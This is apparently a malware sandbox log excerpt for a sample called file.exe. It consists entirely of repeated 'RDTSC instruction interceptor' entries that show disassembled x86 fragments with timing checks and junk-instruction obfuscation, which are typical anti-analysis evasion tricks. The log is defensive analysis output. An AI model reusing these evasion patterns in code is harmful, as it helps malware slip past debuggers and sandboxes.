                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4A1C second address: 5C4A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F96F961C6A8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5ED7 second address: 5C5EE1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F96F8D16A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5EE1 second address: 5C5EE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C64F2 second address: 5C64F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C7538 second address: 5C753E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C753E second address: 5C7542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C84C2 second address: 5C84C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C84C7 second address: 5C84CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9678 second address: 5C968E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB620 second address: 5CB69A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F96F8D16A20h 0x00000008 jmp 00007F96F8D16A1Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F96F8D16A25h 0x00000015 nop 0x00000016 mov ebx, dword ptr [ebp+122D225Ch] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F96F8D16A18h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a sub dword ptr [ebp+122D297Ch], edi 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F96F8D16A28h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC732 second address: 5CC7C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F96F961C6B4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F96F961C6A8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b jmp 00007F96F961C6B8h 0x00000030 push 00000000h 0x00000032 xor ebx, 3CBA83F3h 0x00000038 push 00000000h 0x0000003a call 00007F96F961C6B0h 0x0000003f xor bx, A432h 0x00000044 pop edi 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push esi 0x0000004a pop esi 0x0000004b jg 00007F96F961C6A6h 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC7C4 second address: 5CC7CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC7CB second address: 5CC7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F96F961C6B0h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC7E5 second address: 5CC7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8691 second address: 5C86A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C86A0 second address: 5C86A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C86A5 second address: 5C86AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD534 second address: 5CD5A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F96F8D16A18h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007F96F8D16A1Ah 0x00000028 push 00000000h 0x0000002a mov ebx, dword ptr [ebp+122D38AAh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F96F8D16A18h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c sub dword ptr [ebp+122D2845h], ecx 0x00000052 add edi, 05856346h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD5A7 second address: 5CD5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD5AB second address: 5CD5BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE4BD second address: 5CE513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F96F961C6B0h 0x00000008 jng 00007F96F961C6A6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 add dword ptr [ebp+122D2947h], ebx 0x00000018 push 00000000h 0x0000001a movsx ebx, cx 0x0000001d push 00000000h 0x0000001f sub dword ptr [ebp+12486746h], edi 0x00000025 push eax 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007F96F961C6B8h 0x0000002d jne 00007F96F961C6A6h 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA939 second address: 5CA956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF40C second address: 5CF41B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F961C6ABh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF41B second address: 5CF494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+122D2287h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F96F8D16A18h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov dword ptr [ebp+12482784h], esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F96F8D16A18h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D2998h], ebx 0x00000056 xchg eax, esi 0x00000057 push esi 0x00000058 pushad 0x00000059 push eax 0x0000005a pop eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF494 second address: 5CF4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF4A0 second address: 5CF4AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD810 second address: 5CD81A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F96F961C6A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD81A second address: 5CD81E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD81E second address: 5CD847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jne 00007F96F961C6B7h 0x00000010 jp 00007F96F961C6ACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1CFE second address: 5D1D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2BFF second address: 5D2C04 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C04 second address: 5D2C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2503h], edx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F96F8D16A18h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov bl, 6Fh 0x0000003c mov eax, dword ptr [ebp+122D14C5h] 0x00000042 mov dword ptr [ebp+122D21ADh], esi 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F96F8D16A18h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F96F8D16A26h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C8B second address: 5D2C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C91 second address: 5D2C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C95 second address: 5D2CBF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F96F961C6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F96F961C6BBh 0x00000015 jmp 00007F96F961C6B5h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2CBF second address: 5D2CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F96F8D16A16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3DB5 second address: 5D3DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3DB9 second address: 5D3DC3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F8D16A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3DC3 second address: 5D3DE5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F96F961C6ACh 0x00000008 jns 00007F96F961C6A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F96F961C6ABh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3DE5 second address: 5D3DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F96F8D16A16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF5CD second address: 5CF651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F96F961C6A8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D221Eh], eax 0x00000027 push dword ptr fs:[00000000h] 0x0000002e xor dword ptr [ebp+122D217Bh], eax 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F96F961C6A8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 push edx 0x00000056 adc di, A0DFh 0x0000005b pop edi 0x0000005c adc di, A38Dh 0x00000061 mov eax, dword ptr [ebp+122D147Dh] 0x00000067 mov bx, B71Eh 0x0000006b push FFFFFFFFh 0x0000006d mov edi, dword ptr [ebp+122D38EAh] 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF651 second address: 5CF658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6C58 second address: 5D6C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6C5D second address: 5D6C67 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F8D16A1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE5D5 second address: 5DE5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F961C6B8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1A75 second address: 5E1A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F96F8D16A1Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6E91 second address: 5E6ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F96F961C6AEh 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 jmp 00007F96F961C6B2h 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F96F961C6AAh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7063 second address: 5E70A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F96F9355818h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007F96F935581Ch 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push esi 0x0000001e pushad 0x0000001f jp 00007F96F9355816h 0x00000025 jg 00007F96F9355816h 0x0000002b popad 0x0000002c pop esi 0x0000002d mov eax, dword ptr [eax] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F96F9355823h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E70A7 second address: 5E70BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F96F91F29A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC12B second address: 5EC130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC130 second address: 5EC144 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96F91F29A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC304 second address: 5EC30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F96F9355816h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC30F second address: 5EC315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC315 second address: 5EC31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F96F9355816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC31F second address: 5EC323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC323 second address: 5EC329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC496 second address: 5EC49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC49A second address: 5EC4C9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F9355816h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F96F935581Eh 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 je 00007F96F9355816h 0x0000001f jbe 00007F96F9355816h 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4C9 second address: 5EC4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4CF second address: 5EC4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC798 second address: 5EC79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC79D second address: 5EC7C0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F96F935582Eh 0x00000008 js 00007F96F9355816h 0x0000000e jmp 00007F96F9355822h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC7C0 second address: 5EC7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F96F91F29BAh 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CBA3 second address: 57CBDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F96F935581Eh 0x0000000a jmp 00007F96F9355823h 0x0000000f jno 00007F96F9355816h 0x00000015 popad 0x00000016 push ecx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop ecx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57CBDB second address: 57CBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1F80 second address: 5F1F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2114 second address: 5F212F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29B7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F212F second address: 5F2135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2135 second address: 5F2149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2149 second address: 5F214F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F214F second address: 5F216F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F96F91F29B9h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F25E2 second address: 5F2600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F9355826h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F27BE second address: 5F27C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FA76F second address: 5FA790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F9355826h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C2F4F second address: 5C2F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C2F53 second address: 5C2F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F96F9355816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C2F5D second address: 5C2F6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C2F6B second address: 5C2F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
